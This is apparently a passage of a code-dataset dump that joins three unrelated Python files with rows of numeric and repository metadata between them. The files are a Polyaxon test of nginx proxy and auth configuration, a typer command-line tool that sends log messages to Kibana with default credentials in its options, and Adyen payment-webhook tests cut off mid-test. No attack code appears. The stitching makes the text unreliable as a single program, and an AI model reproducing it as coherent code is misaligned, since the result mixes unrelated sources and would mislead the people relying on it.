proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
location /sso/ {
proxy_pass http://polyaxon-polyaxon-api;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
location /static/ {
proxy_pass http://polyaxon-polyaxon-api;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
""" # noqa
assert get_api_location_config(resolver="") == expected
settings.PROXIES_CONFIG.api_port = 8888
settings.PROXIES_CONFIG.api_host = "foo"
expected = r"""
location = / {
proxy_pass http://foo:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
location /api/v1/ {
proxy_pass http://foo:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
location /ui/ {
proxy_pass http://foo:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
location /sso/ {
proxy_pass http://foo:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
location /static/ {
proxy_pass http://foo:8888;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host $http_host;
proxy_buffering off;
}
""" # noqa
assert get_api_location_config(resolver="") == expected
settings.PROXIES_CONFIG.api_port = 443
settings.PROXIES_CONFIG.api_host = "polyaxon.foo.com"
expected = r"""
location = / {
proxy_ssl_server_name on;
proxy_pass https://polyaxon.foo.com;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
location /api/v1/ {
proxy_ssl_server_name on;
proxy_pass https://polyaxon.foo.com;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
location /ui/ {
proxy_ssl_server_name on;
proxy_pass https://polyaxon.foo.com;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
location /sso/ {
proxy_ssl_server_name on;
proxy_pass https://polyaxon.foo.com;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
location /static/ {
proxy_ssl_server_name on;
proxy_pass https://polyaxon.foo.com;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
""" # noqa
assert get_api_location_config(resolver="") == expected
# Add proxy
settings.PROXIES_CONFIG.has_forward_proxy = True
settings.PROXIES_CONFIG.forward_proxy_port = 443
settings.PROXIES_CONFIG.forward_proxy_host = "moo.foo.com"
expected = r"""
location = / {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
location /api/v1/ {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
location /ui/ {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
location /sso/ {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
location /static/ {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Origin "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header Host polyaxon.foo.com;
proxy_buffering off;
}
""" # noqa
assert get_api_location_config(resolver="") == expected
def test_auth_config(self):
settings.PROXIES_CONFIG.auth_enabled = True
expected = r"""
auth_request /auth/v1/;
auth_request_set $auth_status $upstream_status;
""" # noqa
assert get_auth_config() == expected
settings.PROXIES_CONFIG.auth_enabled = False
assert get_auth_config() == ""
def test_auth_location_config(self):
settings.PROXIES_CONFIG.auth_use_resolver = False
settings.PROXIES_CONFIG.dns_use_resolver = False
settings.PROXIES_CONFIG.auth_enabled = True
expected = r"""
location = /auth/v1/ {
proxy_pass http://polyaxon-polyaxon-api;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host $http_host;
internal;
}
""" # noqa
assert get_auth_location_config(resolver="") == expected
# Use resolver but do not enable it for auth
settings.PROXIES_CONFIG.dns_use_resolver = True
settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
resolver = get_resolver()
expected = r"""
location = /auth/v1/ {
proxy_pass http://polyaxon-polyaxon-api;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host $http_host;
internal;
}
""" # noqa
assert get_auth_location_config(resolver=resolver) == expected
# Enable resolver for auth
settings.PROXIES_CONFIG.auth_use_resolver = True
expected = r"""
location = /auth/v1/ {
resolver coredns.kube-system.svc.cluster.local valid=5s;
proxy_pass http://polyaxon-polyaxon-api;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host $http_host;
internal;
}
""" # noqa
assert get_auth_location_config(resolver=resolver) == expected
def test_external_auth_location_config(self):
settings.PROXIES_CONFIG.auth_use_resolver = False
settings.PROXIES_CONFIG.auth_enabled = True
settings.PROXIES_CONFIG.auth_external = "https://cloud.polyaxon.com"
expected = r"""
location = /auth/v1/ {
proxy_ssl_server_name on;
proxy_pass https://cloud.polyaxon.com;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host cloud.polyaxon.com;
internal;
}
""" # noqa
assert get_auth_location_config(resolver="") == expected
# Add proxy
settings.PROXIES_CONFIG.has_forward_proxy = True
settings.PROXIES_CONFIG.forward_proxy_port = 443
settings.PROXIES_CONFIG.forward_proxy_host = "123.123.123.123"
expected = r"""
location = /auth/v1/ {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host cloud.polyaxon.com;
internal;
}
""" # noqa
assert get_auth_location_config(resolver="") == expected
# Use resolver but do not enable it for auth
settings.PROXIES_CONFIG.has_forward_proxy = False
settings.PROXIES_CONFIG.dns_use_resolver = True
settings.PROXIES_CONFIG.dns_prefix = "coredns.kube-system"
settings.PROXIES_CONFIG.dns_custom_cluster = "cluster.local"
assert get_dns_config() == "coredns.kube-system.svc.cluster.local"
resolver = get_resolver()
expected = r"""
location = /auth/v1/ {
proxy_ssl_server_name on;
proxy_pass https://cloud.polyaxon.com;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host cloud.polyaxon.com;
internal;
}
""" # noqa
assert get_auth_location_config(resolver=resolver) == expected
# Add proxy
settings.PROXIES_CONFIG.has_forward_proxy = True
expected = r"""
location = /auth/v1/ {
proxy_ssl_server_name on;
proxy_pass https://127.0.0.1:8443;
proxy_pass_request_body off;
proxy_set_header Content-Length "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header X-Origin-URI $request_uri;
proxy_set_header X-Origin-Method $request_method;
proxy_set_header Host cloud.polyaxon.com;
internal;
}
""" # noqa
assert get_auth_location_config(resolver="") == expected
| 35.263354
| 238
| 0.664424
| 7,235
| 56,774
| 4.897719
| 0.034416
| 0.073374
| 0.128404
| 0.049781
| 0.960011
| 0.947622
| 0.933512
| 0.921885
| 0.917031
| 0.911613
| 0
| 0.01997
| 0.206204
| 56,774
| 1,609
| 239
| 35.28527
| 0.766304
| 0.016909
| 0
| 0.856846
| 0
| 0.027663
| 0.62866
| 0.129216
| 0
| 0
| 0
| 0
| 0.05325
| 1
| 0.017289
| false
| 0.051176
| 0.006916
| 0
| 0.035961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
81db6137dcbc1a3f073f8ce8ddddc290744d7bf8
| 9,936
|
py
|
Python
|
logger_es_cli/cli_driver.py
|
sharkguto/logger-es-cli
|
eddd8494c442652b2f05b1ca9d1efdb097ddba46
|
[
"MIT"
] | null | null | null |
logger_es_cli/cli_driver.py
|
sharkguto/logger-es-cli
|
eddd8494c442652b2f05b1ca9d1efdb097ddba46
|
[
"MIT"
] | null | null | null |
logger_es_cli/cli_driver.py
|
sharkguto/logger-es-cli
|
eddd8494c442652b2f05b1ca9d1efdb097ddba46
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# cli_driver.py
# @Author : Gustavo Freitas (gustavo@gmf-tech.com)
# @Link :
# from logger_es_cli.dafaults import decorator_factory
from typing import Optional
import typer
from logger_es_cli import logger_factory, logger
import sys
import ujson as json
app = typer.Typer()
@app.command("configure")
def configure(type_config: str = "env"):
"""
command to configure .env file
"""
typer.echo(f"{type_config}")
@app.command("error")
def log_error(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send ERROR loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment.upper(),
project_name=project_name,
send_debug=send_debug,
)
logger.error(message, extra=extra_args)
typer.echo(
f"send ERROR message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
@app.command("warning")
def log_warning(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send WARNING loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment,
project_name=project_name,
send_debug=send_debug,
)
logger.warning(message, extra=extra_args)
typer.echo(
f"send WARNING message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
@app.command("debug")
def log_debug(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send DEBUG loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment,
project_name=project_name,
send_debug=send_debug,
)
logger.debug(message, extra=extra_args)
typer.echo(
f"send DEBUG message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
@app.command("info")
def log_info(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send INFO loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment,
project_name=project_name,
send_debug=send_debug,
)
logger.info(message, extra=extra_args)
typer.echo(
f"send INFO message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
@app.command("critical")
def log_critical(
message: str,
send_debug: bool = typer.Option(False, envvar="SEND_DEBUG"),
exclude_default: bool = typer.Option(True, envvar="EXCLUDE_DEFAULT"),
custom_file: Optional[typer.FileText] = typer.Option(None, envvar="CUSTOM_FILE"),
kibana_ssl: bool = typer.Option(True, envvar="KIBANA_SSL"),
exclude: str = typer.Option("", envvar="EXCLUDE"),
save_filepath: str = typer.Option("/tmp", envvar="SAVE_FILEPATH"),
save_file: bool = typer.Option(False, envvar="SAVE_FILE"),
kibana_server: str = typer.Option("127.0.0.1", envvar="KIBANA_SERVER"),
kibana_username: str = typer.Option("robots", envvar="KIBANA_USERNAME"),
kibana_password: str = typer.Option("127456", envvar="KIBANA_PASSWORD"),
kibana_server_port: int = typer.Option(443, envvar="KIBANA_SERVER_PORT"),
environment: str = typer.Option("DEVELOPMENT", envvar="ENVIRONMENT"),
project_name: str = typer.Option("test-index", envvar="PROJECT_NAME"),
):
"""
send CRITICAL loglevel message
"""
kibana_config = {
"kibana_username": kibana_username,
"kibana_server_port": kibana_server_port,
"kibana_password": kibana_password,
"kibana_server": kibana_server,
"kibana_ssl": kibana_ssl,
}
extra_args = {}
if custom_file:
extra_args = json.loads(custom_file.read())
logger_factory(
funcname=sys._getframe().f_code.co_name,
exclude_default=exclude_default,
exclude=exclude,
kibana_config=kibana_config,
enable_file_log=save_file,
path_log_file=save_filepath,
environment=environment,
project_name=project_name,
send_debug=send_debug,
)
logger.critical(message, extra=extra_args)
typer.echo(
f"send CRITICAL message to kibana: [{message} {kibana_server}:{kibana_server_port}]!"
)
| 35.870036
| 94
| 0.679147
| 1,204
| 9,936
| 5.331395
| 0.078904
| 0.111388
| 0.076336
| 0.031158
| 0.919146
| 0.919146
| 0.919146
| 0.919146
| 0.891883
| 0.876928
| 0
| 0.009556
| 0.18901
| 9,936
| 277
| 95
| 35.870036
| 0.787044
| 0.034622
| 0
| 0.794521
| 0
| 0
| 0.193555
| 0.020008
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027397
| false
| 0.045662
| 0.022831
| 0
| 0.050228
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4b45846e65ac5a8f121e3fe0adb70202b1a2071
| 17,711
|
py
|
Python
|
saleor/payment/gateways/adyen/tests/webhooks/test_handle_notifications.py
|
asadrajput2/saleor
|
26048fa4ceb30813075716ec04f5ebde1bff14c6
|
[
"CC-BY-4.0"
] | 1
|
2021-04-22T12:36:32.000Z
|
2021-04-22T12:36:32.000Z
|
saleor/payment/gateways/adyen/tests/webhooks/test_handle_notifications.py
|
asadrajput2/saleor
|
26048fa4ceb30813075716ec04f5ebde1bff14c6
|
[
"CC-BY-4.0"
] | 2
|
2021-03-20T10:39:06.000Z
|
2021-03-26T01:11:13.000Z
|
saleor/payment/gateways/adyen/tests/webhooks/test_handle_notifications.py
|
asadrajput2/saleor
|
26048fa4ceb30813075716ec04f5ebde1bff14c6
|
[
"CC-BY-4.0"
] | null | null | null |
from decimal import Decimal
from unittest import mock
import graphene
import pytest
from ......order import OrderStatus
from ..... import ChargeStatus, TransactionKind
from ...utils import to_adyen_price
from ...webhooks import (
create_new_transaction,
handle_authorization,
handle_cancel_or_refund,
handle_cancellation,
handle_capture,
handle_failed_capture,
handle_failed_refund,
handle_pending,
handle_refund,
handle_reversed_refund,
webhook_not_implemented,
)
def test_handle_authorization(notification, adyen_plugin, payment_adyen_for_order):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_authorization(notification, config)
assert payment.transactions.count() == 1
transaction = payment.transactions.get()
assert transaction.is_success is True
assert transaction.kind == TransactionKind.AUTH
def test_handle_authorization_with_adyen_auto_capture(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
config.connection_params["adyen_auto_capture"] = True
handle_authorization(notification, config)
assert payment.transactions.count() == 1
assert payment.transactions.get().kind == TransactionKind.CAPTURE
@pytest.mark.vcr
def test_handle_authorization_with_auto_capture(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
psp_reference="853596537720508F",
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
config.auto_capture = True
config.connection_params["adyen_auto_capture"] = False
handle_authorization(notification, config)
payment.refresh_from_db()
assert payment.transactions.count() == 2
assert payment.transactions.first().kind == TransactionKind.AUTH
assert payment.transactions.last().kind == TransactionKind.CAPTURE
assert payment.charge_status == ChargeStatus.FULLY_CHARGED
def test_handle_authorization_with_adyen_auto_capture_and_payment_charged(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
config.connection_params["adyen_auto_capture"] = True
handle_authorization(notification, config)
# payment already has a charge status no need to handle auth action
assert payment.transactions.count() == 0
def test_handle_cancel(notification, adyen_plugin, payment_adyen_for_order):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_cancellation(notification, config)
payment.order.refresh_from_db()
assert payment.transactions.count() == 1
transaction = payment.transactions.get()
assert transaction.is_success is True
assert transaction.kind == TransactionKind.CANCEL
assert payment.order.status == OrderStatus.CANCELED
def test_handle_cancel_already_canceleld(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
create_new_transaction(notification, payment, TransactionKind.CANCEL)
handle_cancellation(notification, config)
assert payment.transactions.count() == 1
@mock.patch("saleor.payment.gateways.adyen.webhooks.order_captured")
def test_handle_capture(
mocked_captured, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_capture(notification, config)
assert payment.transactions.count() == 1
transaction = payment.transactions.get()
assert transaction.is_success is True
assert transaction.kind == TransactionKind.CAPTURE
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.FULLY_CHARGED
mocked_captured.assert_called_once_with(
payment.order, None, transaction.amount, payment
)
def test_handle_capture_with_payment_already_charged(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_capture(notification, config)
# Payment is already captured so no need to save capture transaction
assert payment.transactions.count() == 0
@pytest.mark.parametrize(
"charge_status", [ChargeStatus.NOT_CHARGED, ChargeStatus.FULLY_CHARGED]
)
def test_handle_failed_capture(
charge_status, notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = charge_status
payment.captured_amount = payment.total
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_failed_capture(notification, config)
assert payment.transactions.count() == 1
transaction = payment.transactions.get()
assert transaction.is_success is True
assert transaction.kind == TransactionKind.CAPTURE_FAILED
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.NOT_CHARGED
def test_handle_failed_capture_partial_charge(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.FULLY_CHARGED
payment.captured_amount += payment.total * 2
payment.save()
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_failed_capture(notification, config)
assert payment.transactions.count() == 1
transaction = payment.transactions.get()
assert transaction.is_success is True
assert transaction.kind == TransactionKind.CAPTURE_FAILED
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.PARTIALLY_CHARGED
def test_handle_pending(notification, adyen_plugin, payment_adyen_for_order):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
handle_pending(notification, config)
assert payment.transactions.count() == 1
transaction = payment.transactions.get()
assert transaction.is_success is True
assert transaction.kind == TransactionKind.PENDING
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.PENDING
def test_handle_pending_with_adyen_auto_capture(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
config.connection_params["adyen_auto_capture"] = True
handle_pending(notification, config)
# in case of autocapture we don't want to store the pending status as all payments
# by default get capture status.
assert payment.transactions.count() == 1
assert payment.transactions.get().kind == TransactionKind.PENDING
payment.refresh_from_db()
assert payment.charge_status == ChargeStatus.PENDING
def test_handle_pending_already_pending(
notification, adyen_plugin, payment_adyen_for_order
):
payment = payment_adyen_for_order
payment.charge_status = ChargeStatus.PENDING
payment_id = graphene.Node.to_global_id("Payment", payment.pk)
notification = notification(
merchant_reference=payment_id,
value=to_adyen_price(payment.total, payment.currency),
)
config = adyen_plugin().config
create_new_transaction(notification, payment, TransactionKind.PENDING)
handle_pending(notification, config)
